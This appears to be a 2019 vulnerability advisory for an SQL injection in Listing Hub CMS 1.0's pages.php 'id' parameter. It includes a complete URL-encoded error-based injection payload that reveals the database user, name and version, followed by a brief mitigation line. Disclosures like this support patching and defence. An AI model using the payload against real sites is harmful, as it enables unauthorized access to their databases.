vendor:
Listing Hub CMS
by:
Deyaa Muhammad
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Listing Hub CMS
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:themerig:listing_hub_cms
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: WIN7_x68/Linux
2019
Listing Hub CMS 1.0 – ‘pages.php id’ SQL Injection
Listing Hub CMS 1.0 suffers from a SQL Injection vulnerability. An attacker can perform an 'error-based' SQL Injection using the payload '2%27%20AND%20(SELECT%204588%20FROM(SELECT%20COUNT(*),CONCAT(0x3a3a,user(),0x3a3a,database(),0x3a3a,version(),0x3a3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20-' to access the vulnerable path 'https://[PATH]/pages.php?title=privacy-policy&id=2'
Mitigation:
Input validation and sanitization should be done to prevent SQL Injection attacks.